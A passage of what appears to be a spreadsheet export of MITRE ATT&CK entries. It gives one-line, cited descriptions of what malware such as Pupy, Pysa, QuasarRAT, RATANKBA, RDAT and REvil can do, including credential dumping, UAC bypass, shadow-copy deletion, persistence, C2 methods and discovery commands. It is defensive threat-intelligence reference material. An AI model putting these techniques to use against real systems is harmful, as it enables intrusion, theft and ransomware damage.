    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can capture screenshots at a configurable interval.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can execute commands on the victim.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can compress data with Zip before sending it over C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192)'s default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can record sound with the microphone.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module to clear event logs with PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create domain accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can migrate into another process using reflective DLL injection.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can walk through directories and recursively search for strings in files.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can upload and download to/from a victim machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can sniff plaintext network credentials and use NBNS Spoofing to poison name services.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can execute Lazagne as well as [Mimikatz](https://attack.mitre.org/software/S0002) using PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create local system accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can interact with a victim’s Outlook session and look through folders and emails.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in module for port scanning.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list local and remote shared drives and folders over SMB.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can also perform pass-the-ticket.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module for loading and executing PowerShell scripts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list the running processes and get the process ID and parent process’s ID.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) adds itself to the startup folder or adds itself to the Registry key &lt;code&gt;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run&lt;/code&gt; for persistence.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module that checks a number of indicators on the system to determine if its running on a virtual machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can grab a system’s information including the OS version, architecture, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in utility command for &lt;code&gt;netstat&lt;/code&gt;, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can be used to establish persistence using a systemd service.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can access a connected webcam and capture pictures.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can communicate over HTTP for C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used brute force attempts against a central management console, as well as some Active Directory accounts.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has extracted credentials from the password database before encrypting the files.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the capability to stop antivirus services and disable Windows Defender.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has deleted batch files after execution. (Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the functionality to delete shadow copies.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform OS credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has executed a malicious executable by naming it svchost.exe.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced Port Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used Powershell scripts to deploy its ransomware.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has laterally moved using RDP connections.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used [PsExec](https://attack.mitre.org/software/S0029) to copy and execute the ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) can stop services and processes.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced IP Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) has a command to delete its Registry key and scheduled task.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) used the PowerShell filenames &lt;code&gt;Office365DCOMCheck.ps1&lt;/code&gt; and &lt;code&gt;SystemDiskClean.ps1&lt;/code&gt;.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) was likely obfuscated using Invoke-Obfuscation.(Citation: Unit 42 QUADAGENT July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses PowerShell scripts for execution.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) creates a scheduled task to maintain persistence on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) encodes C2 communications with base64.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the current domain the victim system belongs to.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the victim username.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses VBScripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses cmd.exe to execute scripts and commands on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>A [QuasarRAT](https://attack.mitre.org/software/S0262) .dll file is digitally signed by a certificate from AirVPN.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common web browsers.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can download files to the victim’s machine and execute them.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a built-in keylogger.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to edit the Registry on the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can communicate over a reverse proxy using SOCKS5.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a module for performing remote desktop access.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) uses AES to encrypt network communication.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to gather system information from the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can perform webcam viewing.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can launch a remote shell to execute commands on the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>After decrypting itself in memory, [RARSTONE](https://attack.mitre.org/software/S0055) downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) downloads its backdoor component from a C2 server and loads it directly into memory.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) uses SSL to encrypt its communication with its C2 server.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) performs a reflective DLL injection using a given pid.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uploads and downloads information.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>There is a variant of [RATANKBA](https://attack.mitre.org/software/S0241) that uses a PowerShell script instead of the traditional PE form.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) lists the system’s processes.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the command &lt;code&gt;reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”&lt;/code&gt;.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;net view /domain&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers information about the OS architecture, OS name, and OS version/Service pack.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers the victim’s IP address via the &lt;code&gt;ipconfig -all&lt;/code&gt; command.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;netstat -ano&lt;/code&gt; to search for specific IP address ranges.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;tasklist /svc&lt;/code&gt; to display running tasks.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses cmd.exe to execute commands.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses WMI to perform process monitoring.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. [RDAT](https://attack.mitre.org/software/S0495) can also download data from the C2 which is split into 81,920-byte portions.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can issue SOAP requests to delete already processed C2 emails. [RDAT](https://attack.mitre.org/software/S0495) can also delete itself from the infected system.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can download files via DNS.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has masqueraded as VMware.exe.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can process steganographic images attached to email messages to send and receive C2 commands. [RDAT](https://attack.mitre.org/software/S0495) can also embed additional messages within BMP images to communicate with the [RDAT](https://attack.mitre.org/software/S0495) operator.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has executed commands using &lt;code&gt;cmd.exe /c&lt;/code&gt;.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) hooks several Win32 API functions to hijack elements of the remote system management user-interface.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has the capability of deleting local files.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has used several Win32 API functions to interact with the victim machine.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to destroy files and folders.(Citation: Kaspersky Sodin July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can encrypt files on victim systems and demands a ransom to decrypt the files.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee REvil October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can decode encrypted strings to enable execution of commands and payloads.(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has infected victim machines through compromised websites and exploit kits.(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks GandCrab and REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mark its binary code for deletion after reboot.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the ability to identify specific files and directories that are not to be encrypted.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can download a copy of itself from an attacker controlled IP address to the victim machine.(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been executed via malicious MS Word e-mail attachments.(Citation: G Data Sodinokibi June 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mimic the names of known executables.(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can save encryption parameters and system information to the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used encrypted strings and configuration files.(Citation: G Data Sodinokibi June 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used PowerShell to delete volume shadow copies and download files.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been distributed via malicious e-mail attachments including MS Word Documents.(Citation: G Data Sodinokibi June 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
